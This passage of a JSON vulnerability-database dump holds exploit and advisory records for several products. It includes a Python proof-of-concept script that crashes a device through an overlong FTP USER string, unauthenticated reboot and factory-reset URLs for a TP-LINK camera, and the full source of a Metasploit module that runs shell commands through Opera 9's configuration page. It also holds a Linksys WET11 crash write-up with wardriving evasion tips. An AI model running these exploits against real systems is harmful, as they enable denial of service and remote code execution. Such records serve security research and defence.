system(security measure). #\r\n# #\r\n# To create a successfull exploit outside of the DoS #\r\n# you would need to locate the memory address of the process that reboots the system #\r\n# (there might even be a fallback on that) This is generally too cumbersome as #\r\n# this embeded system doesn't do anything fun anyway (why would you want access) #\r\n#\t #\r\n# In saying that, #\r\n# it would be fairly trivial to use the BoF to write something to the memory. #\r\n# you will notice buffer below only generates the exception 0x0200 aka Machine Check. #\r\n# Increasing the char sent to the unit will change that error to exception 0x1100 #\r\n# meaning we are sending the MINIMUM required length to overflow the buffer. #\r\n# I have done the hardwork for you! Please email me if you get some encodes. \t\t#\r\n# BTW, This could be done like this: #\r\n# from ftplib import FTP #\r\n# ftp = FTP('ip.addr') #\r\n# ftp.login(' '*251) #\r\n# ftp.quit()....but its dirty.\t\t #\r\n#\t\t\t\t\t\t #\t\t\r\n# shoutouts:mabus,gso #\r\n#########################################################################################\r\n\r\nimport socket\r\nimport struct\r\nimport time\r\nimport sys\r\n\r\n\r\nbuff='USER '+' '*251+'\\r\\n'\r\n\r\nif len(sys.argv)!=3:\r\n\tprint \"\\n[+] Usage: %s <ip> <port>\"%sys.argv[0]\r\n\tprint \"[-] Example: python poc.py 192.168.1.23 23\\n\" \r\n\tsys.exit(0)\r\n\r\ntry:\r\n\t\r\n print \"[+] Connecting... %s\" %sys.argv[1]\r\n s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\tconnect=s.connect((sys.argv[1],int(sys.argv[2])))\r\n\tprint \"[+] Sending data...\"\r\n\ttime.sleep(1.2)\r\n\ts.send(buff)\r\n print \"[+] Deed Done\"\r\n s.recv(1024)\r\n\t\r\nexcept:\r\n\tprint \"[#] Unable to connect\"\r\n\r\n\r\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/6909"}], "packetstorm": [{"lastseen": "2016-12-05T22:23:42", "bulletinFamily": "exploit", "description": "", "modified": "2013-06-13T00:00:00", "published": "2013-06-13T00:00:00", "href": "https://packetstormsecurity.com/files/122007/TP-LINK-TL-SC3171-Authentication-Bypass.html", "id": "PACKETSTORM:122007", "type": "packetstorm", "title": "TP-LINK TL-SC3171 Authentication Bypass", "sourceData": "`=========================================================================== \nTP-LINK \n==================================================================== \n=========================================================================== \n \n1.Advisory Information \nTitle: TP-LINK TL-SC3171 Vulnerability \nDate Published: 12/06/2013 \nDate of last updated: 12/06/2013 \n \n2.Vulnerability Description \nThe next vulnerability has been found in this device: \n-CVE-2013-3688. Authentication Bypass Issues(CWE-592) and Execution with Unnecessary Privileges(CWE-250). \n \n3.Affected Products \n-CVE-2013-3688. The following product are affected: TP-LINK TL-SC3171 \nIt\u0092s possible others models are affected but they were not checked. \n \n4.PoC \n4.1.Execute Remote Command bypassing authentication \nCVE-2013-3688, Execute Remote Command bypassing authentication. \nWe have found that is possible to reboot this kind of devices remotely. The attack vector is the following one: \n_____________________________________________________________________________ \nhttp://xx.xx.xx.xx/cgi-bin/reboot \nhttp://xx.xx.xx.xx/cgi-bin/hardfactorydefault \n_____________________________________________________________________________ \n \nIn the first one you will get blank page and you can\u0092t re-login until the device is reboot. \nIn the second one, you will get a victory message and of course, in the next login you should introduce factory settings. \n \n5.Credits \n-CVE-2013-3688, was discovered by Eliezer Varad\u00e9 Lopez, Javier Repiso S\u00e1nchez and Jon\u00e1s Ropero Castillo. \n \n6.Report Timeline \n-2013-05-31: Students team notifies the TP-Link Customer Support of the vulnerability. No reply received. \n-2013-06-03: Students asks for a reply. \n-2013-06-04: TP-Link answers saying Coresecurity reported this vulnerability before and this has been corrected in a new beta firmware version. \n-2013-06-04: Students answer to the vendor saying that this vulnerability is different from the Coresecurity vulnerabilities. \n-2013-06-05: TP-Link answers saying this vulnerability is the same as the vulnerability reported by Coresecurity. \n-2013-06-05: Students respond by explaining the details of the vulnerability and confirming that the vulnerability is different. \n-2013-06-06: TP-Link answer confirming that the vulnerability is fixed with the latest patch for the reported vulnerabilities generated by Coresecurity. The beta version is available on the website of TP-Link \n`\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/122007/tplink-bypassescalate.txt"}], "metasploit": [{"lastseen": "2019-11-24T11:22:05", "bulletinFamily": "exploit", "description": "Opera web browser in versions <= 9.10 allows unrestricted script access to its configuration page, opera:config, allowing an attacker to change settings and potentially execute arbitrary code.\n", "modified": "2017-07-24T13:26:21", "published": "2009-08-18T04:53:35", "id": "MSF:EXPLOIT/MULTI/BROWSER/OPERA_CONFIGOVERWRITE", "href": "", "type": "metasploit", "title": "Opera 9 Configuration Overwrite", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n #\n # This module acts as an HTTP server\n #\n include Msf::Exploit::Remote::HttpServer::HTML\n\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::OPERA,\n :ua_maxver => \"9.10\",\n :os_name => [ OperatingSystems::Match::WINDOWS, OperatingSystems::Match::LINUX ],\n :javascript => true,\n :rank => ExcellentRanking, # reliable cmd exec, cleans up after itself\n :vuln_test => nil,\n })\n\n def initialize(info = {})\n super(update_info(info,{\n 'Name' => 'Opera 9 Configuration Overwrite',\n 'Description' => %q{\n Opera web browser in versions <= 9.10 allows unrestricted script\n access to its configuration page, opera:config, allowing an\n attacker to change settings and potentially execute arbitrary\n code.\n },\n 'License' => BSD_LICENSE,\n 'Author' =>\n [\n 'egypt', # stolen from mpack\n ],\n 'References' =>\n [\n [ 'OSVDB', '66472'],\n ],\n 'Payload' =>\n {\n 'EXITFUNC' => 'process',\n 'Space' => 2048,\n 'DisableNops' => true,\n 'BadChars' => \" \",\n },\n 'Platform' => %w{ unix },\n 'Targets' =>\n [\n #[ 'Opera < 9.10 Windows',\n #\t{\n #\t\t'Platform' => 'win',\n #\t\t'Arch' => ARCH_X86,\n #\t}\n #],\n [ 'Opera < 9.10 Unix Cmd',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n }\n ],\n ],\n # Not sure when this was disclosed but it's been known since at\n # least March 5, 2007, since that's the release date on the version\n # of mpack I stole this from.\n 'DisclosureDate' => 'Mar 5 2007',\n 'DefaultTarget' => 0\n }))\n end\n\n def on_request_uri(cli, request)\n print_status(\"Got request #{request.uri}\")\n\n case request.uri\n when get_resource\n print_status(\"Sending #{self.name}\")\n content = \"<body><script>\"\n content << generate_evil_js(cli, request)\n content << \"</script></body>\"\n headers = { 'Content-Type' => 'text/html' }\n else\n print_status(\"404ing request for #{request.uri}\")\n send_not_found(cli)\n return\n end\n send_response_html(cli, content, headers)\n\n print_status(\"Done with request #{request.uri}\")\n end\n\n def generate_evil_js(cli, request)\n # There are a bunch of levels of quotes here, so the easiest way to\n # make everything line up is to hex escape the command to run\n p = regenerate_payload(cli).encoded\n send_not_found(cli) && return if not p\n\n shellcode = Rex::Text.to_hex(p, \"%\")\n js = <<ENDJS\nblank_iframe = document.createElement('iframe');\nblank_iframe.src = 'about:blank';\nblank_iframe.setAttribute('id', 'blank_iframe_window');\nblank_iframe.setAttribute('style', 'display:none');\ndocument.body.appendChild(blank_iframe);\nblank_iframe_window.eval(\n \"config_iframe = document.createElement('iframe');\" +\n \"config_iframe.setAttribute('id', 'config_iframe_window');\" +\n \"config_iframe.src = 'opera:config';\" +\n \"document.body.appendChild(config_iframe);\" +\n \"cache_iframe = document.createElement('iframe');\" +\n \"cache_iframe.src = 'opera:cache';\" +\n \"cache_iframe.onload = function ()\" +\n \"{\" +\n \"\tconfig_iframe_window.eval\" +\n \"\t(\\\\\"\" +\n \"\told_handler = opera.getPreference('Network','TN3270 App');\" +\n \"\told_pref = opera.getPreference('User Prefs','Run TN3270 In Terminal');\" +\n \"\tshellcode = '#{shellcode}';\" +\n \"\topera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));\" +\n \"\topera.setPreference('User Prefs','Run TN3270 In Terminal','0');\" +\n \"\tapp_link = document.createElement('a');\" +\n \"\tapp_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5)+5)}');\" +\n \"\tapp_link.click();\" +\n \"\tsetTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);\" +\n \"\tsetTimeout(function () {opera.setPreference('User Prefs','Run TN3270 In Terminal',old_pref)},1000);\" +\n \"\t\\\\\");\" +\n \"};\" +\n \"document.body.appendChild(cache_iframe);\" +\n\"\");\nENDJS\n\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/opera_configoverwrite.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "description": "Servers.co.nz Security Advisory SCN200409-1\r\nAvailable in HTML format at \r\nhttp://www.servers.co.nz/security/SCN200409-1.php\r\n------------------------------------------------------------\r\n\r\nSQL Injection vulnerability in bBlog 0.7.3\r\n\r\nAuthor: James McGlinn, Servers.co.nz Ltd <james_at_servers dot co dot \r\nnz>\r\nDiscovery Date: September 28, 2004\r\nPackage: bBlog\r\nVersions Affected: 0.7.2, 0.7.3\r\nSeverity: Severe - a remote user can gain administrative privileges.\r\n\r\n------------------------------------------------------------\r\n\r\nProblem: There is an SQL Injection vulnerability in versions of bBlog \r\nprior to 0.7.3, which can be exploited to gain administrative access if \r\nregister_globals is enabled on the web server.\r\n\r\nIntroduction: bBlog is a blogging system written in PHP and released \r\nunder the GPL. It is used by thousands of bloggers worldwide and has \r\nfeatures not found on other blogging systems including advanced comment \r\nspam prevention and threaded comments.\r\n\r\nDiscussion: The array $p is not initialised before being populated and \r\npassed to $bBlog->make_post_query() on line 30 of rss.php. In an \r\nenvironment where register_globals is enabled, $p can be introduced to \r\nthe script with unfiltered elements from user input.\r\n\r\nUsing a specially crafted URL, POST data or cookie a remote user can \r\ngain access to the admin user's access credentials. Exploit withheld at \r\nproject maintainer's request.\r\n\r\nSolution: This issue is fixed as of version 0.7.4. A patch for rss.php \r\nof version 0.7.3 is available at the URL below:\r\nhttp://www.servers.co.nz/security/patches/SCN200409-1/rss.php-patch.txt\r\n\r\n------------------------------------------------------------\r\n\r\nABOUT SERVERS.CO.NZ LTD\r\n\r\nServers.co.nz are leaders in the design, implementation & auditing of \r\neffective online information systems for SMEs.\r\n\r\nPhone: (NZ) 0800 4 SERVERS\r\n\r\n------------------------------------------------------------\r\n\r\n\r\nJames McGlinn\r\nProject Manager\r\nBCom, BSc, Zend Certified Engineer (PHP)\r\n\r\nServers.co.nz Ltd\r\n68 Shortland St, Auckland PO Box 3688 Shortland St, Auckland, New \r\nZealand\r\nPhone: 0800 4 SERVERS Fax: +64 9 358 5187\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.netsys.com/full-disclosure-charter.html", "modified": "2004-10-01T00:00:00", "published": "2004-10-01T00:00:00", "id": "SECURITYVULNS:DOC:6909", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6909", "title": "[Full-Disclosure] SQL Injection vulnerability in bBlog 0.7.3", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:18", "bulletinFamily": "software", "description": "By using Clear Channel Assessment procedure weakness attacker equipped with standard client card can prevent data transmission over network.", "modified": "2004-05-13T00:00:00", "published": "2004-05-13T00:00:00", "id": "SECURITYVULNS:VULN:3688", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:3688", "title": "IEEE 802.11 collision avoidance procedure weakness", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:06", "bulletinFamily": "software", "description": "\r\nenZo Notice\r\nDate: 24/10/02\r\nProduct: Linksys WET11 (Wireless Bridge)\r\nMentioned By: netmask\r\nFirmware Versions: 1.3.2, 1.3.1\r\nAdvisory Url: http://www.enZotech.net/advisories/linksys.wet11.txt\r\nProblem: Linksys WET11 crashes when sent an ethernet frame from its own MAC address\r\nRisk: To each his own.. But we say low.. It's just a DoS. Hell,\r\n speaking on 802.11 security, this may actually be a positive impact\r\n vulnerability, and increase your security =)\r\n\r\n\r\n\r\n ZZZZZZZZZZZZZZZZZZZ\r\n Z:::::::::::::::::Z\r\n nnnn nnnnnnnn Z:::::::::::::::::Z ooooooooooo\r\n n:::nn::::::::nn Z:::ZZZZZZZ::::::Z oo:::::::::::oo\r\n eeeeeeeeeee n::::::::::::::nn ZZZZZ * Z::::::Z o:::::::::::::::o\r\n ee:::::::::::eenn:::::::::::::::n 2 Z:::::Z o:::::ooooo:::::o\r\n e:::::::::::::::een:::::nnnn:::::n 0 Z:::::Z o::::o o::::o\r\n e::::::eeeee::::::en::::n n::::n 0 Z:::::Z o::::o o::::o\r\n e:::::e e:::::en::::n n::::n 2 Z:::::Z o::::o o::::o\r\n e::::::eeeee::::::en::::n n::::n * Z:::::Z o::::o o::::o\r\n e::::::::::::::::e n::::n n::::n Z:::::Z o:::::ooooo:::::o\r\n e:::::eeeeeeeeeee n::::n n::::nZZZ:::::Z ZZZZZo:::::::::::::::o\r\n e::::::e n::::n n::::nZ::::::ZZZZZZZZ:::Z oo:::::::::::oo\r\n e:::::::e nnnnnn nnnnnnZ:::::::::::::::::Z ooooooooooo\r\n e:::::::eeeeeeeeee Z:::::::::::::::::Z\r\n ee::::::::::::::e ZZZZZZZZZZZZZZZZZZZ\r\n ee:::::::::::::e \... www.enZotech.net .../\r\n eeeeeeeeeeeeee\r\n\r\n The above is radical ascii art..\r\n Yet again.. The Below is a lame Discovery.\r\n\r\n\r\n\r\n\r\n\r\n*** Product information:\r\n\r\nThe Linksys WET11 is an Ethernet to 802.11b bridge. It can bridge a single\r\nhost, or an entire network (Up to 50 machines). If you are in a situation\r\nwhere wireless is appropriate for you, these can be handy devices. Whether\r\nit's just hooking up your PS2 or Xbox to the lan, or letting your neighbor\r\nconnect his entire network to yours, this device will let you do it. It's\r\na small device, the size of 1991 style Walkman, with a detachable SMC\r\nantenna. Web based configuration, supporting 64/128 bit WEP, Ad-Hoc or\r\ninfrastructure mode, Modifiable transmission rates, DHCP client for unit\r\nIP, and a few more features.\r\n\r\nOverall, for a price of $100, this device is fairly neat for those who are\r\nwilling to have 802.11 on their network.. Or, to stick your neighbor or\r\nxbox/PS2 in your DMZ. I'm really not interesting in going over the "802.11\r\ncan't be secured" discussion, that's not the point here. However, one\r\nother nice feature to mention.. is the devices usefulness in a war driving\r\nsituation. If you have 1 Cisco 350 card, and 1 15dB Antenna.. But four\r\npeople.. This $100 device, could save quite a bit of money, and let\r\neveryone get the benefits of your single antenna. When Kismet picks up a\r\nnetwork, you quickly reconfigure your unit to sit on it. Allowing everyone\r\nin the van to use regular ethernet cards, and you move the antenna over to\r\nunit, and everyone is set. While we don't condone accessing networks that\r\nare not your own, if you were to do such a thing, you should keep in mind\r\nyou can NOT change the MAC address on this device, and you may end leaving\r\nyour device MAC address in logs around the area, which could incriminate\r\nyou later when federal officers are doing their jobs, and kick in your\r\ndoor.\r\n\r\n\r\n\r\n*** Data:\r\n\r\nWhen configuring a WET11, you have to run their Windows application to do\r\nthe initial configuration, which is configured entirely by UDP\r\nbroadcasting. The first thing the software does, is probe for devices on\r\nthe network by broadcasting to port 4000 of 255.255.255.255:\r\n\r\nPacket Analysis (This is really unrelated to the problem,\r\n I just thought I'd include it out of boredom)\r\n\r\n\r\nProbe Packet:\r\n<UDP headers snipped>\r\n16 bytes:\r\n\r\n87 65 43 21 11 00 00 01 /* This data isn't clear.. Everything but the 6th byte\r\n is identical to the first 8 bytes of the response\r\n packet */\r\na0 00 0d c9 e7 7c /* MAC Address of your machine */\r\n00 00 /* NUL */\r\n\r\n\r\nResponse Packet:\r\n<UDP headers snipped>\r\n120 bytes:\r\n\r\n87 65 43 21 11 10 00 01 /* Everything but the 6 byte is the same as the\r\n first 8 in the Probe packet */\r\na0 00 0d c9 e7 7c /* MAC address of the requesting machine */\r\n00 06 25 02 e4 71 /* MAC address of the WET11 */\r\n45 53 33 30 30 62 /* Ascii: ES300b */\r\n00 /* NUL */\r\n10 6c 69 6e 6b 73 79 73 /* Ascii: linksys */\r\n00 00 00 00 00 00 00 00 /* NUL */\r\n00 00 00 00 00 00 00 00 /* NUL */\r\n00 00 00 00 00 00 00 00 /* NUL */\r\n00 00 /* NUL */\r\n06 10 0e c0 a8 01 e1 /* unknown data, can be removed */\r\n\r\n4c 69 6e 6b 73 79 73 20 57 45 54 31 31 /* SSID of unit, Default is\r\n "Linksys WET11" */\r\n\r\n00 00 00 00 00 00 00 00 /* NUL */\r\n00 00 00 00 00 00 00 00 /* NUL */\r\n00 00 00 00 /* NUL */\r\nff ff ff 00 /* Netmask 255.255.255.0 */\r\nc0 a8 01 01 /* 192.168.1.1 (Default gw. The\r\n unit default IP is 192.168.1.225) */\r\na6 e7 94 7f 8c 4b 9a ec /* This data changes on every response.. */\r\na5 13 87 /* This data changes on every response.. */\r\n\r\n\r\nIf you replay the response packet to the broadcast (Or modify the\r\nDestination address in the header to the actual unit IP)... The unit crashes\r\nright away.. Stops responding completely. At this point you have to hard\r\ncycle the unit.\r\n\r\nYou don't really have to replay the packet, it's just an easy way of doing\r\nit.. The actual problem is the unit doesn't know what to do when Source\r\nMAC in the DLC header is the same as it's own. Really all you have to\r\ndo is forge a packet to a broadcast address, or directly to the unit,\r\nusing it's MAC in the ethernet frame, and the unit will crash. You don't have\r\nto hit it on an open port (udp 4000, tcp 80). You just have to use\r\nit's MAC in your header, and send direct or broadcast that packet. We only\r\ntested with UDP.\r\n\r\n\r\n*** Exploiting:\r\n\r\nAs it says above, forge it's MAC in the DLC header, and hit it\r\nwith a packet, and it's gone. Over the weekend we'll toss up a\r\nconfiguration application for the device that lets you do the same\r\nthing the Windows software does, and may just include the option in\r\nthere. Look for it at http://www.enZotech.net/\r\n\r\n\r\n*** Solution:\r\n\r\nWait for Linksys to release a firmware upgrade. Or maybe they won't\r\nsee this as a problem.\r\n\r\n\r\n*** Workaround:\r\n\r\nUnplug your unit.. We guess. Or more likely, don't be bothered\r\nby this.. Because really, who cares?\r\n\r\n*** Initial Report Information:\r\n\r\nAdvanced notice wasn't given because this bug wasn't determined to be very\r\ncritical. These devices are fairly new, and the chance of attack isn't that\r\ngreat. Further, we didn't bother because in the past, Linksys hasn't bothered\r\nto respond to security problems.\r\n\r\n*** Miscellaneous:\r\n\r\nIt is also recommended to disable the "Allow Upgrade Uploads" option,\r\nunder the Admin tab in the web configuration. This is on by default. While\r\nthere were no security issues found in this feature, it does open up tftp\r\non the device when enabled, and might as well disable it.\r\n\r\n\r\n\r\n\r\nnetmask of enZo\r\nhttp://www.enZotech.net\r\n\r\n", "modified": "2002-10-26T00:00:00", "published": "2002-10-26T00:00:00", "id": "SECURITYVULNS:DOC:3688", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:3688", "title": "Linksys WET11 crashes when sent an ethernet frame from its own MAC address", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:17", "bulletinFamily": "software", "description": "Gate crashes on receiving Ethernet packet from own Mac.", "modified": "2002-10-26T00:00:00", "published": "2002-10-26T00:00:00", "id": "SECURITYVULNS:VULN:2371", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:2371", "title": "Linksys WET11 \u0412\u0449\u042b", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}